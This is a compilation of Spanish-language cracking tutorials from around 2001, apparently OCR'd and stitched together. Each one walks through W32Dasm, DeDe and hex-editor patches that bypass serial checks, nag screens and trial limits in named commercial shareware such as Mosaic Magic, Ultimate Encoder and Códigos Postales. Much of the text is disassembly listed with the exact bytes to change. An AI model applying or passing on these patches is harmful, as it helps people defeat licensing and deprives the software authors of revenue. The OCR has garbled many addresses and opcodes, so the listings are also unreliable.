:00402785 8B542470 mov edx, dword ptr [esp+70] 
:00402789 8BCE mov ecx, esi 
:0040278B 52 push edx 


:0040278C 6880494000 push 00404980 
:00402791 6878494000 push 00404978 


* Reference To: MFC42.Ordinal: 1903, Ord:1903h 
:00402796 E89B060000 Call 00402E36 
:0040279B 6884624000 push 00406284 
:004027A0 6888494000 push 00404988 


:004027A5 6878494000 push 00404978 
:004027AA 8BCE mov ecx, esi 


* Reference To: MFC42.Ordinal: 1903, Ord:1903h 


:004027AC E885060000 Call 00402E36 
:004027B1 6A10 push 00000010 


* Possible StringData Ref from Data Obj ->"X3 Wizard" 
:004027B3 6898614000 push 00406198 
* Possible StringData Ref from Data Obj ->"Invalid Registration Code." 


:004027B8 6860614000 push 00406160 <--aquí caemos!! 


vemos que hay un salto (C)ondicional en 00402749 vamos a Goto>Code Location e introducimos 00402749 
llegaremos aquí. 


:00402742 ES69020000 call 004029BO <-- hmm.. call sospechosa.. 
:00402747 85C0 test eax, eax 

:00402749 743A je 00402785 <--aquí caemos! ! 

:0040274B 8B442470 mov eax, dword ptr [esp+70] 

:0040274F 8BCE mov ecx, esi 

:00402751 50 push eax 

:00402752 6880494000 push 00404980 


vemos que hay un JE <Jump if Equal> el cual checa los datos.. lo podemos modificar con un JNE <Jump if Not 
Equal> o por un JMP <jump> para que siempre salte.. vemos el offset.. 


2749.. <recuerden que los Os a la izq no valen y la h indica hexadecimal> cerramos w32dasm y vamos al editor hex.. 
edit> goto, apuntamos 2749 y llegamos.. 


00002738/|2418 C684 2468 0000 0000 ES69 0200 0085 CO[?4 SADB|S...$...... 1 


ahora sí.. cambiamos ese 74 <JE> por un 75 <JNE> o por un EB <JMP, que siempre salta..> 


00002738/|2418 C664 2488 0000 0000 ES69 0200 0085 CO75 BABB|S...$...... 1 


guardamos cambios.. recuerda.. si tienes el programa corriendo.. o el w32dasm cargado con el programa.. no va a 
aceptar los cambios.. así que ciérralo..corremos el programa.. nos registramos de nuez.. nos dice.. 


como el programa no tiene nag.. vamos a "About" y vemos esto.. 


jajajaja! ! sí!! engañamos al programa de nuevo.. ni siquiera checó los datos que introdujimos.. nomás lo registró.. 
vaya.. esa call no sirvió de nada.. mucho menos el test eax, eax!! jaja.. 


>>>despedida.. 


diablos.. nunca pensé que fuera tan fácil.. éstos de X3 merecen alguien.. quien sea.. 
cualquiera.. que sepa un poco de cracking.. porque con eso.. “poz “ta 1/2 difícil vender 
no?? 


quiero agradecer a to2 los tutores que escriben “pa que los newbies aprendamos y 
nuestro nivel crezca.. también agradezco a toda la raza de tutoriales 2001, dirigida por 
el reconocido PrOFeSoR_X, al bueno de [DeK_OiN] <que me ha ayudado mucho, me 
tiene un poco de paciencia.. un poco?? tal vez a veces se excede!! jeje..>, a karpoff.. y a 
to2 los newbies que me leen me han ayudado mucho... pero thanx a to2 por tenerme 
paciencia.. muchas gracias..!! 


por último, les recomiendo echen un ojo por éstas páginas... 


AZTIAnKIlAn 


Karpoff Spanish Tutor 


WKT! Foro 
TutoLetal 
K-For 


hasta la próxima!! 
dudas? comentarios?? 


smash O gamehacks.net 


recuerda: éstos textos son exclusivamente para fines intelectuales.. de ninguna 
manera tratamos de perjudicar a los programadores.. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Códigos Postales 2001 


Serial 


Acepte cualquier serial 


Recomendable para newbies 


Newbie 


Dede 2.50, W32dasm y Editor Hexadecimal 


Xirtam 3/4/01 


INTRODUCCION 


Ya se que lo interesante sería sacar el serial válido y así no tener que tocar el 
ejecutable para nada, pero este tutorial lo que busca es esa primera esperanza para 


los que están empezando y no se den por vencidos. 


También demostrar el poder de Dede para programas en delphi. 


AL ATAKE 


Lo desensamblamos conW32dasm y en las string data references no 


nos sale esa asquerosa nag 
Atención 


Su número de Licencia no es válido. 


4W32D asm List of String Data Items Mal E 


To Search Disassembly for String Data, Double Click on Text Cancel Search 


String Resource ID=61092: '"Yersión GIF desconocida" 
String Resource ID=61093: "Error de codificación de la imagen GIF" 

String Resource ID=61094: "Los datos codificados del GIF están corruptos'" 

String Resource 1D=61095: "El tamaño de ódigo del GIF no está comprendido entre 2 y 9" 
String Resource ID=61096: "Número de colores incorrecto. Ha de ser una potencia de 2" 
String Resource 1D=61097: "Bloque de extensión no reconocido: %.2x" 

String Resource ID=61098: "No hay datos que escribir en el GIF" 

String Resource ID=61099: "No se puede cambiar de tamaño a una imagen GIF" 

String Resource ID=61100: "Imagen GIF de CompuServe" 

String Resource 1D=61257: "Función aún no implementada" 

String Resource ID=65280: "Type mismatch for field '%s', expecting: %s actual: Zs" 

String Resource ID=655139: "Format 'Zs' invalid or incompatible with argument" 

String Resource ID=65535: "Division by zero'" 

19 xgr 

“9 

"ANIMEXTS1.0(" 

"CJH" 


ps 
Copy ll Copy View | 


Aqui entra en acción el Dede; lo ejecutamos y cargamos el archivo en cuestión, 
en este caso codpostal.exe, veremos lo siguiente: 


¡DeDe y2.50 (c) 1999-2001 by DaFixer A E 
File Dumpers Tools Options ¿About 


[D:SArchivos de programa Codigos Postales 2 + 5] Process | CodPostal 


[ Classes Info | Units Info | Forms | Procedures | Project | Exports | 


| Class Name JUniName [ser [oFmMoOfiser [=| Version: D5 


»).s1 00483848 00000000 Unit List [from PACKAGEINFO) 
is 0047CE60 00000000 

e) 82 0046224 00000000 

me) Boolean 00401004 — 00000000 

e) Byte 00401058 00000000 

e) Cardinal 00401080 00000000 

e) Char 0040102 00000000 

e) Currency 004010C4 00000000 

e) Double 00401084 — 00000000 

e) EAbort 00408318 00000000 

e EábstractError OD408B8e 00000000 

e) EAssertionFailed 00408B28 00000000 

ad ERitsEror AMANFFRA ARANA ES 


Ready 60 sec. CodPostal. exe 1153024 bytes Y 


* Para cargar el archivo búscalo pulsando en la carpeta y dale a process. 


Vamos a "procedures" y nos salen los formularios del programa a la izquierda 
llamados Unit (x) 


DeDe v2.50 (c] 1999-2001 by DaFixer ox] 
File Dumpers Tools Options About 


[D:SArchivos de programa! Codigos Postales 2 + ] 5] Process CodPostal 


Classes Info | Units Info | Forms ¡[ Procedures | Project | Esports | 


DBLogDlg TLoginDialog 


DBPw'Dlg TPasswordDialog 
Unitl TForrmnl 
Unitl 3 TFormSplash 


Unit2 


TForrn2 


BitBtr1 Click 


00444660 


Unió TForm3 “PROC”O0444744 00444744 FFFF 
Unit TFormá “PROC”0044474C 0044474C FFFF 
Units TForm5 PROC"00444794, 00444754, FFFF 
Unit TFomé “PROC”0044475C 00444750 FFFF 
Unit? TForm? “PROC”004447AF 0048475F FFFF 
Unit8 TForm8 PROC”004447BD 004847BD FFFF 

“PROC”004447BF 0044 47BF FFFF 

“PROC”004447C1 00444701 FFFF 


“PROC”O004447C3 


00444703 


Ready 6Ú sec. [CodPostal.exe 1153024 bytes JA 


Los exploramos un poco y nos fijamos en el Unit2, pulsamos y nos salen a la 
derecha sus objetos; no hace falta ser un experto para darse cuenta de que 
BitBtnClick es un botón así que le damos con el botón derecho y elegimos show 
additional data y nos sale esto: 


BitBtn1 Click 
Event = OnClick 


Owner = BitBtn1(TBitBtn) 
Caption = 'Registrar' 


BitBtn1 Click NA 
PROCDÓLA, Copy current RWA, to clipboard PRFF 


“PROC”0044. paa ns FFFF 
“PROC”0044. MIA ÓN FFFF 
“PROC”0044 pj FFFF 
PROC-00A A o asSemble FFFF 


que vemos!, hemos topado con el botón registrar, aceptamos y damos doble click 
sobre BitBtnClick y nos sale una pantalla parecida a la de el w32dasm; el 
código que vemos es lo que está dentro del botón registrar por así decirlo así 
que ahí estará la rutina de comprobación, los mensajes de no estas registrado 
etc... así que miramos un poco más para abajo y nos encontramos esto: 


í=] ES 


1 TForm2.BitBtn1 Click 
Navigation Edit Plugins 


AE 


ds TForm2.BitBtn1 Click l 
D04A446E5 ESOACAFSFF call D04310F4 
DO04246EA 837DE400 cmp dword ptr [ebp-$1C], +; 
D04A446EE 7418 3z 00444708 
D04446F0O 6430 push $30 
* Possible String Reference to: 'Atención' 
l 
DO042446F2 B950474A00 mov ecx, $00444750 
* Possible String Reference to: 'Su número de Licencia no es vál: 
| ¡ANAAAA<A<A<ááAAAAA<<<áAáx<xá<«<x<xxá<<x<x>--Á 
D04246F7 BA5C474A00 mov edx, $f004A4475C 
* Reference to Tipplication instance 
l 
D04A46FC A124C24B00 mov eax, dword ptr [$4BC22: 
004244701 S8B00O mov eax, [eax] 


Vamos al w32dasm y en el menu a goto / goto code location y metemos esta 
dirección 004A46f2, cuando estemos allí nos fijamos un poco más arriba y hay un 
salto que se refiere a esa dirección. 


52 URSoft W32D asm Ver 8.93 Program Disassembler?Debugger 
Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:004446CE(C) Este es el salto que llega a el mensaje de error 

| 

:004A446DC SD55E4 
:004446DF S8B33E4020000 
:004446E5 ESOACAFSFF 
:004A446EA 837DE400 
:004A446EE 7418 


lea edx, dword ptr [ebp-1C] 

mov eax, dword ptr [ebx+000002E4] 
call 004310F4 

cmp dword ptr [ebp-1C], 00000000 
je 00414708 


:004A446F0 6430 push 00000030 
:004246F2 B950474A00 mov ecx, 00444750 —— Esta es la dirección del mensaje 
:004A446F7 BAS5C474A00 mov edx, 00444750 

:004A446FC A124C24B00 mov eax, dword ptr [004BC224] 

:00444701 S8BOO mov eax, dword ptr [eax] 

: 00444703 ES48BOFAFF call 0044F750 


Lo que tenemos que hacer ahora es averiguar el offset y nopearlo con el editor 
hexadecimal y nos aceptará cualquier serial. 


¿Como se hace esto?, así: 


De nuevo en w32dasm goto / goto code locations y esta vez metemos la dirección 
del salto antes mencionado (004A46CE) 


:004446D0 C7833402000001000000 mov dword ptr [ebx+00000234], 00000001 


:004446DA EB36 jmp 00444712 

* Referenced by a (U)nconditional or (C)jonditional Jump at Address: 
1:004A446CE(C) 

| 

:004446DC SD55E4 lea edx, dword ptr [ebp-1C] 
2004A446DF S3B33E4020000 mov eax, dword ptr [ebx+000002E4] 
:004446E5 ESOACAFSFF call 004310F4 

:004446EA 2837DE400 cmp dword ptr [ebp-1C€], 00000000 
:004A446EE 7418 je 00444708 

:004446F0O 6430 push 00000030 

:004446F2 B950474A00 mov ecx, 00444750 

:004446F7? BASC474A00 mov edx, 0044475C 

:004A446FC A124C24B00 mov eax, dword ptr [004BC224] 
:00444701 SB00 mov eax, dword ptr [eax] 
200444703 ES48BOFAFF call 0044F750 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A46EE (C) 

| 

:00444708 C7833402000003000000 mov dword ptr [ebx+00000234], 00000003 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:004A446DA (0) 

| 

200444712 33C0 xor eax, eax 

200444714 5A pop edx 

:00444715 59 pop ecx 

00444716 59 pop ecx 

200444717 6489210 mov dword ptr fs: [eax], edx 
200444714 683F474A00 push 0044473F 


Line:358217 Pa 7165 of 7399 Code Data (2:004446CE (Offset 0O004,34CEh jh File: CodPostal. exe 


En esta imagen vemos todo lo que necesitamos, apuntamos el offset A3ACE y el 
salto “750C. 


Ahora cargamos en el editor hexadecimal (yo uso el Hex Workshop) el 
codpostal.exe, en el menu vamos a edit / goto y metemos el offset, aceptamos y 
nos muestra el salto que nos interesa 


Hex Workshop - [CodPostal] 


[ File Edit Disk Options Tools Window Help 


¿ul6 ale alas lol a efe 


DOOA3ACO ESC? S5BF6 FFOB 55E8 558EB 3AFA FSFF o. A 
DOOA3ADO C763 3402 0000 0100 0000 EB36 6D55 E48B de da 6.U.. 


lo cambiamos por 9090 y guardamos, nos aceptará cualquier serial. 
FIN 
Aclaraciones: 
1.El dede solo sirve para programas hechos en delphi. 
2.Este manual es para newbies y solo para newbies. 
3.Este es mi primer manual así que tendrá errores. 


4.Este documento está hecho con fines educativos, el autor no se hace 
responsable del uso que se haga de la información. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: Ultimate Encoder 2001 v 3.0 


1. Quitar NAg Screen y Tiempo Limite 


PROTECCION: 
Objetivo: 1. Quitar NAg Screen y Tiempo Limite 
Descripcion: http://www.usro.net/ 
Dificultad: Newbie 
DOWNLOAD : http://www.usro.net/ 
] 1. W32dasm v 8.9 
Herramientas: 
CRACKER: Profesor_X FECHA: 05/07/2001 


INTRODUCCION 


Bueno chavales otra vez aqui despues de unos cuantos dias, vamos a escribir otro tuto mas, la verdad este tuto lo tenia 
atrasado ya que sali de vacaciones y me fui a hechar unas chelas=cervezas a la playa y la verdad vi una chicas que nada mas 


AL ATAKE 


| Comentario del Programa | 


este programita la verdad me gusto muchisimo, es para convertir musica a 2 formatos principales MP3 y WAV, esta 
app les sera de gran utilidad para muchos de ustedes, los estudios preliminares de velocidad en la conversion de 
formato MP3 a WAV de una cancion de 4.5 megas fue de 30 segundos y de WAV A MP3 de una cancion de 34.4 
megas fue de 45 segundos a 128 nits de calidad, la verdad me parecio muy rapido en la conversión, les va a gustar, 
pruebenlo, pero un favor COMPRENLO NO SEAN GANDALLAS ......... ;)D, tambien recuerden que este tuto solo 
esta hecho con motivos de investigacion de la protección que tiene, no me hago responsable de el uso que cualquier 


lamer le pueda dar... OK ENTENDIDOOOOO.... 


Manos a la Obra 


BUENO ! lo primero como siempre es analizar el programa para ver en que esta hecho y si esta empakado, mis 
utilerias favoritas para analizar es el File Inspector v 4.2 y el Lenguaje 2000 , las mejores herramientas a mi punto de 
vista, OK analizemos el exe y esto es lo que me aparece: 


é C-WArchivos de programa WE ncoder WWE nc. exe 


ok! amigos como podemos ver esta hecho en Visual C++ v 5.0 y la sorpresa no esta empakado, que suerte no...?, 
bueno ahora vamos y ejecutamos el programa y nos aparece la siguiente ventana: 


como podemos ver aqui esta una Dialog Box la cual contiene unas cuantas lineas de texto, bueno amigos 
desensamblemos el exe de el Ultimate Encoder y esperamos un ratin y por fin termina, ahora que seria el siguiente 
paso?, claro buscar el string que aparece en la DIALOG BOX THIS IS AN UNREGISTERED BLA BLA 
BLA..... BUSQUEMOSLO.... y despues de un buen ratin lo encontramos: 


IW32Dasm List of String Data Items 


ncoder cannot 


' Raw 
Sting Resource 1D=00121: LE Fado o e WAV po 
String Resource 1D=00122 "You did not selected ary Audio track for reading ..!" 
A GUIS os Can sad pudo Do 


facil, pero que mas da probemos a eliminar esa call, para eso pues ya sabemos el procedimiento sacamos su offset de 
esa CALL que es 


ahgora abrimos una copia del UENCODE.EXE con el Hexworkshop v 3.01 y damos CONTROL G y en la ventana 
que sale ponemos el offsett y nos manda a la siguente parte del codigo: 


lo que haremos es anular esa call para que nunca de los nunca aparesca la DIALOG BOX y tambien nunca compare el 
tiempo que llevamos analizandolo y asi tendremos el tiempo del mundo para analizar el programita, para hacer eso 
vamos y cambiamos por: 


para los que estan en el cielo , cambie E8195D0200 por 9090909090 ya que los 90 significan NOP“S en hexadecimal, 
y pusimos cinco 90's por que son 5 bytes que hay que remplazar : 


E8= 1 BYTE 
19= 1 BYTE 


ENTIENDEN ? 


AHORA SI PODEMOS DECIR PROGRAMA CRACKEADO......... 


Skuater : """" mi gran maestro 


Dek_OiN """"Estamos Locos ... jejejejjee.... 
Kuato Thor """" Compañero de mil batallas, don quijote y sancho panza ..... jejejje""""" 
ActMAgo """" Sigue asl....."""" 


Karpoff """" El guru de las protecciones 


Txeli mun COMPADRE Y AMIGO mea 


e Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


e Saludos a todos los crackers del mundo 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. 


e Si deseas bajar la última versión de la compilación puedes hacerlo de aquí: Compilación de Tutoriales v 


3.5 


e Si deseas aparecer en la compilación envía tu tutorial a: profesor_xGHhotmail.com 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


http:/ / www.mpi.leeds.ac.uk/ | nstrumentation/ temp/ mosaicmagicv2-00.zip 
O COS EIN CTCE 


INTRODUCCION 


Si, seguro que alguna vez has visto algun poster de Bob Marley hecho de pequeñitas fotos que, mirado de 
lejos, hacia la forma de Bob. Pues eso se hace con este programita, que aunque muy currado tiene una 
protección que es una porquería. 


Cuando lo abras te saldra un asistente (o como dicen los guiris, un wizard). Puedes cerrarlo, pues no nos va a 
decir como 'petar' el programa. Si te animas a hacer un mosaico de esos, te daras cuenta de que no te deja 
guardarlo... y dices 'QUE CABRON", con lo que tarda en hacerlos. Pues quedate con el mensajito que sale: 
'This option is not available...' bla, bla, bla... Se va a enterar! 


AL ATAKE 


Abre el W32Dasm y desensambla el programa. Ahora lo vamos a atacar por el punto flaco que tienen la mayoría de 
programas: los mensajitos tipo 'Que te registres de una vez!'. En el menú Refs eliges String data references, y en la lista 
buscas el mensajito de antes: 


Voy a suponer que sabes algo de desensamblador. Al menos te voy a contar que la instruccion JE significa que cuando 
el programa compara dos numeros, saltara si son iguales (Jump if Equal). El JNE es el contrario; el JMP saltara 
directamente, sin comprovar nada; y asi la ostia de saltos diferentes. La instruccion que compara dos numeros es la 
CMP (Compare), aunque tambien lo hace TEST. 


Haces un doble clic y aterrizaras en esta posicion del codigo: 


* Reference To: MFC42.0Ordinal:0490, Ord:0490h 


:00409098 E88B2F0400 Call 0044C028 

:0040909D 8B4804 mov ecx, dword ptr [eax+04] 

:004090A0 ES5BF4FFFF call 00408500 <- Esta Call parece interesante 

:004090A5 85C0 test eax, eax 

:004090A7 7522 jne 004090CB <-— Cambiando este salto solo aconseguiriamos que no nos 
enseñase el mensajito 

:004090A9 50 push eax 

:004090AA 50 push eax 


* Possible StringData Ref from Data Obj ->"This option is not available in " 
->"the trial version of Mosaic Magic" 


:004090AB 68D80C4700 push 00470CD8 <- Apareces aqui 


Fijate en la Call que hay un poco mas arriba... sospechosa, no? Haz un doble clic sobre ella y... sorpresa! Aparece esto: 


* Referenced by a CALL at Addresses: 

| :0040840B , :0040846D , :004090A0 , :004099F2 , :0040B046 <- Desde todas estas direcciones 
se llama a esta funcion, que comprueba el Serial Number (de ahora en adelante SN) 
| 

:00408500 64A100000000 mov eax, dword ptr fs:[00000000] <- Apareces aqui 
:00408506 G6AFF push FEFFFFFFE 

:00408508 6878D54400 push 0044D578 

:0040850D 50 push eax 

:0040850E 64892500000000 mov dword ptr fs: [00000000], esp 

:00408515 83EC54 sub esp, 00000054 

:00408518 8D442400 lea eax, dword ptr [esp] 

:0040851C 56 push esi 

:0040851D 57 push edi 

:0040851E 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Key 1" 
:00408520 68340A4700 push 00470A34 

:00408525 68C0884700 push 004788C0 

:0040852A 50 push eax 


* Reference To: MFC42.Ordinal:0DC2, Ord:0DC2h 

| 

:0040852B E80A3E0400 Call 0044C33A 

:00408530 8B742408 mov esi, dword ptr [esp+08] 

:00408534 8B56F8 mov edx, dword ptr [esi-08] 

:00408537 83FA14 cmp edx, 00000014 <- Aqui comprueba si el SN tiene 14 caracteres 
:0040853A 7424 Je 00408560 <-— Si no es 14, apaga y vamonos 


Todo este cacho en rojo, literalmente, te da por culo 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004085A0 (C) 

:0040853C 8D4C2408 lea ecx, dword ptr [esp+08] 

:00408540 C7442464FFFFFFFF mov [esp+64], FFFFFEFEF 


* Reference To: MFC42.0Ordinal:0320, Ord:0320h 

:00408548 E8B9380400 Call 0044BE06 

:0040854D 5F pop edi 

:0040854E 33C0 xor eax, eax 

:00408550 5E pop esi 

:00408551 8B4C2454 mov ecx, dword ptr [esp+54] 

:00408555 64890D00000000 mov dword ptr fs: [00000000], ecx 


:0040855C 83C460 add esp, 00000060 
:0040855F C3 ret <- Retorno BAD CRACKER! Desde aqui volvera a donde han llamado la funcion, 
pero diciendole al programa que lo has hecho muy mal :-( 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040853A(C) 
De aqui en adelante hace dos bucles, comprovando el SN 


:00408560 53 push ebx 

:00408561 33C0 xor eax, eax 

:00408563 8D4C2410 lea ecx, dword ptr [esp+10] 
:00408567 BF14000000 mov edi, 00000014 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :0040857D(C) 

:0040856C OFBE1C30 movsx ebx, byte ptr [eax+esi] <- Inicio del primer bucle 
:00408570 40 inc eax 

:00408571 8919 mov dword ptr [ecx], ebx 

:00408573 3BC2 cmp eax, edx 

:00408575 7C02 31 00408579 

:00408577 33C0 xor eax, eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408575 (C) 

:00408579 83C104 add ecx, 00000004 

:0040857C 4F dec edi 

:0040857D 75ED jne 0040856C <- Retorno del primer bucle 

:0040857F 33C9 xor ecx, ecx 

:00408581 8D742410 lea esi, dword ptr [esp+10] 

:00408585 5B pop ebx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004085A9 (C) 

:00408586 8BC1 mov eax, ecx <- Inicio del segundo bucle 
:00408588 BFO05000000 mov edi, 00000005 

:0040858D 99 cdg 

:0040858E F7FF idiv edi 

:00408590 8B06 mov eax, dword ptr [esi] 

:00408592 2BC2 sub eax, edx 

:00408594 2503000080 and eax, 80000003 

:00408599 7905 3jns 004085A0 

:0040859B 48 dec eax 

:0040859C 83C8FC or eax, FFFFFEFEC 

:0040859F 40 inc eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :00408599(C) 

:004085A0 759A jne 0040853C <- Por este salto se va al cacho rojo :-( 

:004085A2 41 inc ecx 

:004085A3 83C604 add esi, 00000004 

:004085A6 83F914 cmp ecx, 00000014 

:004085A9 7CDB 31 00408586 <- Retorno del segundo bucle 

:004085AB 8D4C2408 lea ecx, dword ptr [esp+08] <- Si llega aqui, es que el SN ha pasado todas 
las comprovaciones y es bueno 

:004085AF C7442464FFFFFFFF mov [esp+64], FEFFFFEF 


* Reference To: MFC42.Ordinal:0320, Ord:0320h 
:004085B7 E84A380400 Call 0044BE06 

:004085BC 8B4C245C mov ecx, dword ptr [esp+5C] 

:004085C0 5F pop edi 

:004085C1 B801000000 mov eax, 00000001 <- Puede ser que poniendo un 1 en EAX indique que 
estas registrado? 

:004085C6 5E pop esi 

:004085C7 64890D00000000 mov dword ptr fs: [00000000], ecx 


:004085CE 83C460 add esp, 00000060 
:004085D1 C3 ret <- Retorno OK ;-) 


Si, ya lo se: he metido casi la mitad del codigo, pero realmente es un cacho muy interesante. Nos indica desde donde se 
comprueva si el programa esta registrado, nos indica como hacer un KeyGen (un generador de SN), ... si tienes tiempo 
de estudiar todas esas operaciones aritmeticas (INC, ADD, SUB, IDIV...) que hace, podras crear el SN correcto. Y si 
eres rico y te sobra el tiempo, puedes comprovar que buscando el mensaje que sale cuando intentas introducir un SN 
incorrecto tambien ta llevara a la misma funcion de comprovacion. Mientras tanto, si tienes prisa, puedes hacer una 
pequeña trampita: hacer que el programa se salte toda la comprovacion y se vaya directamente hacia el RET bueno. 


Para eso, solo hay que cambiar el primer salto (un JE que esta en 0040853A), el que comprueva el tamaño del SN, por 
otro salto que vaya directamente hasta el final del ultimo bucle, exactamente en la direccion 004085AB. Voy a 
ilustrarlo un poco: 


Instruccion original: 


Instruccion: Parejas de bytes a saltar: | Codigo resultante: 


JE (74) [24 (en hexadecimal; en decimal es 36) | 7424 


Nueva instruccion: 


Instruccion: Parejas de bytes a saltar: Codigo resultante: 


JMP (EB) 6F (en A en decimal es EB6F 


Lo has entendido? Vamos, que tienes que cambiar un 7424 por un EB6F. Pues abres el editor hexadecimal (en mi caso 
Hex Workshop), vas a la direccion donde esta el JE (853A, aunque en el desensamblador te ponga '0040853A”) y 
cambias el 7424 por el EB6F (Y LO GUARDAS”). Y ya ta! 


Ahora podras guardar todos los mosaicos que te den la gana. Pero ten en cuenta el esfuerzo que cuesta programar (lo se 
por experiencia) y, ahora que te has divertido y has demostrado que eres mas listo que un monton de instrucciones, 
COMPRA EL PROGRAMA. Si lo quieres, claro. Petar programas solo sirve para pasar un buen rato y estrujarte el 
cerebro, como el ajedrez. Este manual solo se ha hecho con fines educativos, no para tener programas gratis. 


Bueno, espero que me haya explicado, y ya nos veremos si consigo petar otro programa facilon. 


zerU 


Karpoff Spanish Tutor 1999-2001 


Programa: Encrypt-1t v2.00 


PROTECCION: Nag-Screen el aby durante el uso y al 

cerrar la aplicacion 
B E Aplicacion para proteger cualquier archivo 

Descripcion: y dl : E il hi 
mediante encriptacion 

Dificultad: Novato 

DOWNLOAD : http: //www.acdsystems.com 

Herramientas: W32dasm 8.93, Hex Workshop 2.20 

CRACKER: FECHA: 01/07/2001 

Fantomas: 


INTRODUCCION 


Hola a todos (as), ahora vamos a analizar esta aplicacion unicamente con el 
W32dasm, como podran observar es sencillo y rapido, y terminaremos quitando las 
molestas Nag-Screen ( y tal parece que las saca al azar o cada determinado 
tiempo, o cuando le da la gana, pero eso lo vamos a evitar ) 


AL ATAKE 


Primero carguemos la aplicacion con el w32dasm, y busquemos la cadena Register 


Now, What is Shareware ORegistration Benefits! 


EncipplAll - Sharamara 


Para ello seleccionamos Bel en la barra de herramientas, y al final de la lista vamos 
a encontrar algo parecido a esto 


observemos que nos fue mejor de lo esperado ya que encontramos la cadena 
SHAREWAREMSG y esto nos va a ahorrar algo de tiempo, seleccionamos haciendo 


"Doble Click' con el Mouse una y otra vez, y encontramos cuatro posiciones donde 
se crea el NAG-Screen, estas son 


:0007.0A12 B8 3C 02 NAG-Screen del inicio 
:0007.169E B8 4EÉ 03 NAG-Screen final 
:0007.1817 B8 5B 03 NAG-Screen temporal 
:0007.1ADF B8 E5 03 NAG-Screen de salida rapida 


en las cuatro posiciones encontramos que las rutinas son semejantes 


20007. 0412 
20007. .0415 
20007. 0417 
20007. 0418 
20007. 0415 
20007. .0415c 
20007.041F 
2007. 040 
20007.04%1 
20007. 0425 
0007.04 4 


20007.1695E 
20007.1641 
20007. .1643 
20007. .1644 
2 0007.1645 
20007.1648 
20007.1648 
0007. 1640 
20007. 164D 
2 0007.16E1 
20007.16B6 


:0007.1817 
20007.1814 
20007.1815 
20007.181D 
20007.181E 
20007.1821 
20007. .1824 
20007.182%5 
20007. .182%6 
20007. .18Z%A 
20007. .182F 


BES3c0Z 
SCD. 


BS3EzZÉ 
BEA7T102 

bz 

50 
FF3é64400 
SAFADO LTDA 
S3Cc404 


ES4E03 
Sc. 

BE 

50 
BS3EzZÉ6 
BEA56lÉ 
BE 

50 
FF3é64400 
SAFADOAS1É6 
S3Cc404 


ES5E0O3 
aCcD.4 

5E 

50 
BSS3EZó6 
BiAF117 
5E 

50 
FF364400 
SAFAOOZZ15 
S3Cc404 


ESE5OS 
Scb.4 

sz 

50 
BS3EZÉ 
BEAE¿D15E 
bz 

50 
FF3é64400 
SAFAOOEA1A 
35404 


mov ax, DZ3c 

mov dx, ds 

push dx 

push ax 

mor ax, Z¿ó6JE 

mov dx, SECADOR of Segnernt 0007 
push dx 

push ax 

push word ptr [0044] 
call 0007. D00FA 

add sp, 0004 


mor ax, 

mor dx, 

push dx 

push ax 

mor ax, Zó6JE 

mor dx, SEG ADOBE of Seguent 0007 
push dx 

push ax 

push word ptr [0044] 
call 0007. 00FA 

add sp, OD0LZ 


mov ax, ÓO35B 

mor dx, ds 

push dx 

push ax 

mo” Ax, ¿6J3E 

mor dx, SEC ADDE of Seqment 0007 
push dx 

push ax 

push word ptr [0044] 
call 0007. 00FA 

add sp, 000% 


mor ax, O3ES 

mor dx, ds 

push dx 

push ax 

mor ax, Zó6JE 

mor dx, SEG ADOBE of Segnent 0007 
push dx 

push ax 

push word ptr [0044] 
call 0007. 00FA 

add =p, DO00LZ 


Por lo tanto saltaremos cada una de estas rutinas sustituyendo 


:0007.0A12 B8 3C 02 por :0007.0A12 E9 18 00 OffSet 0000.8012 
:0007.169E B8 4E 03 por :0007.169E E9 18 00 OffSet 0000.8C9E 
:0007.1808 B8 00 00 por :0007.1808 E9 27 00 OffSet 0000.8E08 
:0007.1ADF B8 E5 03 por :0007.1ADF E9 26 00 OffSet 0000. 90DF 


una vez realizado esto, solo nos faltara eliminar la rutina de Beep que una vez 


pasados cinco minutos empieza a actuar repetidamente cada segundo, asi que 
busquemos un SetTime 


Rapidamente voy a hablar sobre esto, se encuentran dos call User.SetTimer , SÍ 
eliminamos la funcion del primero de ellos 


:0005.01B1 B8F401 mov ax, 01F4 
:0005.01B4 50 push ax 

:0005.01B5 2BC0 sub ax, ax 

:0005.01B7 50 push ax 

:0005.01B8 50 push ax 

:0005.01B9 9AFFFFO0000 call USER.SETTIMER 
:0005.01BE 8946EA mov [bp-16], ax 
:0005.01C1 C45EEC les bx, [bp-14] 
:0005.01C4 26894704 mov es: [bx+04], ax 


se elimina de la barra de estado el reloj y la fecha 


OA IO ia 


por lo tanto tenemos la segunda opcion 


* Referenced by a Unconditional Jump at Address :0007.0958 


:0007.0904 833067900 cmp word ptr [7906], 0000 
:0007.0909 7503 jne 0908 
:0007.090B E94D00 jmp 095B 


* Referenced by a Conditional Jump at Address :0007.0909 
| 

:0007.090E FF364A00 push word ptr [004A] 

:0007.0912 B80100 mov ax, 0001 

:0007.0915 50 push ax 

